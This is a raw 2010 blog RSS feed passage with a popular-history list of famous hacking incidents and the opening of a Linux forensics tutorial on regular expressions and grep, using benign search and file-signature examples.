&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #16507e; font-family: arial, verdana, sans-serif; font-size: 14px; font-weight: bold; line-height: 21px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/11/list-of-world-best-top-hackers-of-all.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://bp2.blogger.com/_r8GjWqN6cvM/R5mTL9LwbcI/AAAAAAAAAsA/EImadeNwPKY/s72-c/hacker.jpg" height="72" width="72"/><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-2364161989207482365</guid><pubDate>Sat, 13 Nov 2010 18:55:00 +0000</pubDate><atom:updated>2010-11-17T06:53:04.420-08:00</atom:updated><title>Top 10 Hacking Incidents- History of Hackers</title><description>&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&lt;b&gt;Top 10 hacking incidents of all time&lt;/b&gt; — instances where some of the most seemingly secure computer networks were compromised.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Early 1990s&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Kevin Mitnick&lt;/b&gt;&lt;b&gt;,&lt;/b&gt; often incorrectly called by many as god of hackers, broke into the computer systems of the world&#39;s top technology and telecommunications companies &lt;b&gt;Nokia, Fujitsu, Motorola, and SunMicrosystems&lt;/b&gt;. He was arrested by the &lt;b&gt;FBI in 1995&lt;/b&gt;, but later release don parole in 2000. He never termed his activity &lt;b&gt;hacking&lt;/b&gt;, instead he called it &lt;b&gt;social engineering.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;November 2002&lt;/b&gt;&lt;br /&gt;
Englishman&lt;b&gt; &lt;/b&gt;&lt;b&gt;Gary McKinnon&lt;/b&gt;&lt;b&gt; &lt;/b&gt;was arrested in November 2002 following an accusation that he hacked into more than &lt;b&gt;90 US military computer systems in the UK&lt;/b&gt;. He is currently under going trial in a British court for a &quot;&lt;b&gt;fast-track extradition&lt;/b&gt;&quot; to the US where he is a wanted man. The next hearing in the case is slated for today.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1995&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Russian computer geek &lt;b&gt;Vladimir Levin&lt;/b&gt; effected what can easily be called &lt;b&gt;The Italian Job online &lt;/b&gt;- he was the first person to hack into a bank to extract money. Early 1995, he hacked into&lt;b&gt; &lt;/b&gt;&lt;b&gt;Citibank and robbed $10 million&lt;/b&gt;. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the &lt;b&gt;US, Finland, Holland, Germany and Israel.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1990&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
When a Los Angeles area radio station announced a contest that award eda &lt;b&gt;Porsche 944S2 &lt;/b&gt;for the 102nd caller, &lt;b&gt;Kevin Poulsen &lt;/b&gt;took control of the entire city&#39;s telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1983&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Kevin Poulsen&lt;/b&gt; again. A little-known incident when Poulsen, then just a student, hacked into &lt;b&gt;Arpanet&lt;/b&gt;, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1996&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
US hacker &lt;b&gt;Timothy Lloyd&lt;/b&gt;&lt;b&gt; &lt;/b&gt;planted six lines of malicious software code in the computer network of &lt;b&gt;Omega Engineering&lt;/b&gt; which was a prime supplier of components for NASA and the US Navy. The code allowed a &quot;&lt;b&gt;logic bomb&lt;/b&gt;&quot; to explode that deleted software running Omega&#39;s manufacturing operations. Omega lost &lt;b&gt;$10 million&lt;/b&gt; due to the attack.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1988&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Twenty-three-year-old Cornell University graduate&lt;b&gt; Robert Morris &lt;/b&gt;unleashed the first Internet worm on to the world. Morris released 99 lines of code to the Internet as an experiment, but realised that his program infected machines as it went along. Computers crashed across the US and elsewhere. He was arrested and sentenced in 1990.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1999&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The &lt;b&gt;Melissa virus&lt;/b&gt; was the first of its kind to wreak damage on a global scale. Written by &lt;b&gt;David Smith (then 30)&lt;/b&gt;, Melissa spread to more than 300 companies across the world completely destroying their computer networks. Damages reported amounted to nearly &lt;b&gt;$400 million&lt;/b&gt;.Smith was arrested and sentenced to five years in prison.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2000&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Mafia Boy&lt;/b&gt;, whose real identity has been kept under wraps because he is a minor, hacked into some of the largest sites in the world, including&lt;b&gt; &lt;/b&gt;&lt;b&gt;eBay, Amazon and Yahoo&lt;/b&gt;&lt;b&gt; &lt;/b&gt;between February 6 and Valentine&#39;s Day in 2000.He gained access to &lt;b&gt;75 computers in 52 networks&lt;/b&gt;, and ordered a Denial of Service attack on them. He was arrested in 2000.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1993&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
They called themselves &lt;b&gt;Masters of Deception&lt;/b&gt;, targeting US phonesystems. The group hacked into the &lt;b&gt;National Security Agency, AT&amp;amp;T, andBank of America&lt;/b&gt;. It created a system that let them bypass long-distance phone call systems, and gain access to private lines.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://amit-spot.blogspot.com/2010/11/top-10-hacking-incidents-history-of.html</link><author>noreply@blogger.com (Amit Tyagi)</author><thr:total>17</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-3223329760036199213</guid><pubDate>Sat, 13 Nov 2010 16:51:00 +0000</pubDate><atom:updated>2010-11-13T08:51:31.518-08:00</atom:updated><title>Linux Forensics: Pattern Matching wh Grep and Related Tools</title><description>&lt;table border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;2&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;      &lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;&lt;b&gt;&lt;/b&gt;     &lt;/span&gt;    &lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td class=&quot;dark-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td align=&quot;left&quot; class=&quot;light-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 12px;&quot;&gt;&lt;div align=&quot;left&quot;&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVOZIkLL2G4nMzR4Di06fVKLbqJQcI1uhhsXUDmv9Rp2IhDEJUgV5h_NCavC-SetyCWfXrIH6oEL_6RKaBS6-WdPQLsL4kDd6M7J2pBcARlu2gUxlyG6RVPET7CdAIp2OkAnrDKVQjBXI/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVOZIkLL2G4nMzR4Di06fVKLbqJQcI1uhhsXUDmv9Rp2IhDEJUgV5h_NCavC-SetyCWfXrIH6oEL_6RKaBS6-WdPQLsL4kDd6M7J2pBcARlu2gUxlyG6RVPET7CdAIp2OkAnrDKVQjBXI/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt; &lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Pattern matching is locating a given sequence within a pool of  information.  Everyone who has used Google knows in essence what this is  and the importance of refining search terms to weed out unnecessary  information from the vast sums available on the Internet.  This analogy  is applicable to forensic investigations involving digital evidence; it  is desirable to avoid the clutter of unwanted information. The benefits  of pattern matching are two in number: to increase productivity and the  likelihood of finding desired information.  A synopsis of regular  expressions and an exploration of their importance and efficacy  regarding those ends follows; their use is applied with tools common to  most GNU/Linux systems.  Ancillary topics include network forensic tools  and scripting, the latter of which seeks to provide analogous functions  between the tools discussed and competing forensic software.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;Introducing Pattern Matching:&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A term intertwined with pattern matching is &amp;amp;#039;regular  expressions&amp;amp;#039;.  They&amp;amp;#039;re synonyms in essence, with the  former denoting the action of locating a desired occurrence in a larger  data set, and the latter denoting the language by which this is often  accomplished.I II  Another, potentially inaccurate, synonym for pattern  matching and regular expressions is “grep.” The word “grep” goes back to  Unix in which editors like ed which phrased search and print functions  like g/re/p, wherein “re” is the desired search pattern, and it would  print the result to standard output.III Forward closer to the present  day, and grep is less used in such a specific context; it now means  approximately to find a given pattern.  Specifically, grep is one of  many programs that use regular expressions (the language of pattern  matching).  Alternatively, it is oft used as a verb to connote this  action.  This paper will make liberal use of the word in the spirit of  grep&amp;amp;#039;s use in colloquial English.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Over time regular expressions became diversified into a multitude of  different camps, of which about a dozen are reasonably popular at the  present day.  Some are as followsIV: &lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Perl&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; GNU BRE&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; GNU ERE&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; POSIX BRE&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; POSIX ERE&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; Java&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; .NET&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; Python&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; Ruby&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; XML&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt; XPath&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;It is important to note that since these were developed somewhat  independently, one should not trust on the fact that regular expressions  for one tool will work with another, unless said tool is explicit in  stating the standard being used.  For instance, FTK and EnCase, use  syntax similar to Perl.  Without such knowledge, one may assume a  pattern in one (grep with BRE syntax) would apply to the other, and  evidence may be passed over because of such an error.V Though set  standards for regular expressions exist,VI VII derivations from a given  standard to incorporate aspects from other standards or to add  additional functionality may be present and the lack of such should not  be assumed barring the explicit declaration of software providers that  given tools conform strictly to set standards.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A simple example of such a difference between different regular  expression standards would be the pattern [a-z]\{3\} using the Perl and  POSIX BRE engines.  The POSIX BRE engine would match a string like  “abc”, while the Perl engine would match something like “b{3}”  literally.  This is one of many differences between the engines that are  available—because of this, it can be helpful, at least initially, to  focus primarily upon one style of regular expressions, adjusting them  when necessary, rather than attempting to explore the nuances of each in  turn.VIII  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Perl-style syntax allows the search of non-printable characters.IX   Secondly, support for Perl regex is widespread, probably more so than  any other regex engine.  The GNU grep utility discussed in a later  section has a -P switch signifying Perl syntax for the regular  expression, saving the frustration of dealing with an entirely new  syntax.  Also,  transitions from Perl syntax to POSIX BRE is both less  likely to be necessary and perhaps easier than the opposite.  The  preponderance of tools explored in a later section of this paper have  shared support for the Perl syntax as well.  In the effort to make this  paper easier to understand, non-Perl syntax will be eschewed when  possible.X XI&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Keeping this in mind, consider for a moment the regular expression  syntax of the most popular engine at the moment, Perl.XII  Perl is a  scripting language, similar to PHP, most commonly tied to server-side  scripting, dynamic web page generation, and a close relationship with  MySQL.XIII  PHP uses Perl syntax.  On many websites, data is entered by  the customer and sent to the server.  If this data is not in the  appropriate form when said data reaches the server, PHP can alter said  data via three sets of functions: the preg group, the ereg group, and  the mb_ereg group.XIV  Of these, only the preg group will be  discussed,XV and it is not even necessary to know either scripting  language to comprehend said languages&amp;amp;#039; regex capacity.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The function preg_match(&amp;amp;#039;/cat/&amp;amp;#039;,$string) would search  for the phrase “cat” within the string $string.  The single-quotes  embody the regular expression, and the forward slashes act as  delimiters:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue; font-size: small;&quot;&gt;&amp;lt;?php &lt;/span&gt;&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span style=&quot;color: blue; font-size: small;&quot;&gt; $string=&quot;concatenate&quot;; &lt;/span&gt;&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt; $res=preg_match(&amp;amp;#039;/cat/&amp;amp;#039;,$string); &lt;/span&gt;&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt; echo $res; &lt;/span&gt;&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span style=&quot;color: blue; font-size: small;&quot;&gt; ?&amp;gt; &lt;/span&gt;&lt;span style=&quot;color: yellow; font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/tt&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The result to the terminal would be “1.”&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;A slightly more complex expression might be cat|dog, where the  expression matches either the phrase “cat” or “dog.” This is a very  useful feature called “alternation,” the use of which will be shown  later for searching for a number of different patterns at once.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Applied uses of regular expressions:&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;In a multitude of books available on the subject of regular  expressions, as the book progresses further towards the conclusion, the  example expressions seemingly continue to advance further and further in  complexity.  This is an example of a complex expression:XVI &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;(?=\d)^(?:(?!(?:10\D(?:0?[5-9]|1[0-4])\D(?:1582))|(?:0?9\D(?:0?[3-9]|1[0-3])\D(?:1752)))((?:0?[13578]|1[02])|(?:0?[469]|11)(?!\/31)(?!-31)(?!\.31)|(?:0?2(?=.?(?:(?:29.(?!000[04]|(?:(?:1[^0-6]|[2468][^048]|[3579][^26])00))(?:(?:(?:\d\d)(?:[02468][048]|[13579][26])(?!\x20BC))|(?:00(?:42|3[0369]|2[147]|1[258]|09)\x20BC))))))|(?:0?2(?=.(?:(?:\d\D)|(?:[01]\d)|(?:2[0-8])))))([-.\/])(0?[1-9]|[12]\d|3[01])\2(?!0000)((?=(?:00(?:4[0-5]|[0-3]?\d)\x20BC)|(?:\d{4}(?!\x20BC)))\d{4}(?:\x20BC)?)(?:$|(?=\x20\d)\x20))?((?:(?:0?[1-9]|1[012])(?::[0-5]\d){0,2}(?:\x20[aApP][mM]))|(?:[01]\d|2[0-3])(?::[0-5]\d){1,2})?$&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The expression captures dates, times, and datetimes, including leap  years.  While this is a very comprehensive pattern and excellent  intellectual exercise, the most useful and helpful regular expressions  may be much less complex.XVII  Additionally, the more complex the  pattern, the more likely it is to fail, both on account of user error  and the restrictiveness of the search pattern.  Keeping this in mind, it  is more useful to start with simplistic patterns and refine towards  more restrictive ones than vice versa. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Knowing how to tweak regular expressions is more valuable than having a  seemingly infallible set of regular expressions to fall back on;  despite the advanced features of matching synonyms and fuzzed spelling  in FTK, there are instances in which these fail and custom-made patterns  are necessary.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;What follows are examples of composed regular expressions and the  application of several expressions in a forensic context.XVIII As  well,this paper branches out to include specific instances of the  utilization of regular expressions and pertinent information surrounding  the use of grep in the context of Linux-based forensic  investigation.XIX  There will obviously be far fewer example regular  expressions than could have been incorporated into such a paper, being  as the number of expressions possibly relevant is limited only by the  imagination.   These were primarily withheld on account of a desire for a  reasonably terse discussion about regular expressions in particular  instances—books have been written on the subject which might serve to  better elucidate readers of different expressions of pertinence.  The  references for this paper serve as an excellent guides specifically for  regular expressions, as well as accompanying topics such as procuring  forensic images with Linux, for any issue deemed by readers to be  covered in insufficient detail.XX  &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Introducing Grep:&lt;/b&gt;&lt;/i&gt;-&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The grep tool&amp;amp;#039;s usefulness comes from its ability to sift  through data sets to match a pattern, making it well suited for forensic  work.XXI  Two common (not necessarily forensic) uses are as follows:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;ps -e | grep “ge” &lt;/span&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This prints all processes (ps lists processes to standard output) that  have “ge” in the process name.XXII &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;cat /var/log/messages | grep &quot;fail&quot;&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Prints the file /var/log/messages to standard output.  This however is  redirected with the &amp;amp;#039;|&amp;amp;#039; (pipe) as standard input to  the grep program.  Grep prints out the lines matching the pattern  “fail.”&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Grep can be a capable tool in an examiner&amp;amp;#039;s toolkit,  especially if live analysis is desired on a Linux system.  Since grep is  very likely already present, it may as well be used.XXIII  Exploring  the implications of live analysis is beyond the scope of this paper, but  note that using grep on a machine on which it already exists would  likely alter  little as opposed to the introduction of novel programs to  a system.XXIV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Going back to the examples of grep&amp;amp;#039;s usage above, the pipe  operator is frequently used; the pipe symbol signals the shell to direct  the standard output of the first command and use such as the standard  input of the second.  Knowledge of standard streams/file descriptors is  required to understand the full implications of this.  Most of the  requisite understanding of such can be gathered from online sources.XXV&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Concerning file descriptors, grep&amp;amp;#039;s output is easily  redirected to a file for later review.XXVI  Frequently in examining a  case, the output would be better read to a file.  This is easily done,  as shown: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br style=&quot;color: yellow;&quot; /&gt; &lt;span style=&quot;color: blue;&quot;&gt;grep “greed” ./* &amp;gt; file 2&amp;gt; err&lt;/span&gt;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The &amp;amp;#039;&amp;gt;&amp;amp;#039; symbol redirects this data to a file for  subsequent examination.  The &amp;amp;#039;2&amp;gt;&amp;amp;#039; directs error  messages (e.g. “Warning: recursive directory loop”) to a different file.   If you do not care about the errors at all, direct 2 to /dev/null.   Many errors are helpful in discerning why a particular search is not  working as expected, but it is possible as has been illustrated to  separate error messages from ordinary output, both of which are, by  default, written to the terminal. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Another terminal trick is as follows: &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE :&lt;span style=&quot;color: yellow;&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
grep “greed” ./* &amp;amp;&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;After this, pressing enter will return the user to a command prompt.  It  is possible via such to run multiple searches at the same time (it is  recommended to combine this with redirection to a file).  Typing “fg”  will bring this background job to the foreground once again.  This  assumes the use of Bash; for other shells consult the documentation for  similar functionality.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Concerning the topic of the three major forms of grep--grep, egrep, and  grep -P—the last will be and should be used most frequently.  The  reasons for this are several.  First, grep by default uses POSIX BRE  syntax, which varies significantly from grep -P in that special  characters must be escaped.  This ensures for more cross-compatibility  between regular expressions composed on the Linux command line and tools  such as FTK.  Next both grep and egrep do not support searching for  non-printable ASCII characters such as spaces via \x20.  Lastly, the  selection of the Perl syntax with grep allows for alternation, which is  supported under egrep as well but avoids the cross-compatibility issues.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Building expressions:&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The following illustrates some simple searches with grep using patterns  that may be forensically pertinent.  Worth mentioning is that it may be  helpful to experiment with expressions as opposed to simply reading of  them.  In EnCase, you may utilize the keyword tester (available in the  tab for keywords when you make a new keyword).XXVII    The following  examples shall be formatted for the grep utility bundled with many Linux  distributions—downloadable for no cost from many websites.XXVIII  For  the most part these examples may even be done via the use of a Live  distribution—a bootable cd/dvd.  The Bash shell is assumed.XXIX&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The following grep will capture all jpeg photos in the current  directory:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;CODE : &lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;code&quot; style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;tt&gt;&lt;br /&gt;
grep -P “^\xFF\xD8\xFF” ./*&lt;br /&gt;
&lt;/tt&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The -P switch tells the grep program to use Perl syntax, followed by the  pattern of hexadecimal characters (using the anchor  &amp;amp;#039;^&amp;amp;#039;, notably), and then the search path, which is all  files in the current working directory.  It is worth mentioning that  something to this effect is done with forensic software that categorizes  files via signature values—this is done via pattern matching as well.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Exif metadata in a forensic investigation may provide interesting and  possibly crucial data pertinent to an investigation and serves a good  example for something easily locatable with regular expressions.   Typical attributes present in Exif metadata include camera make and  model, date and time information, camera settings, picture thumbnail  (oft utilized for display on a camera screen). &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Some new, high-end camera models actually incorporate a feature called  geolocation, which tags photos with information about the locality of  the picture.  &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Exif metadata is typically distinguishable from a typical picture by  ASCII text subsequent to the file header.XXX  With jpeg files, a regular  expression can be constructed to determine which files may contain Exif  metadata and which don&amp;amp;#039;t:XXXI &lt;/span&gt;&lt;br /&gt;
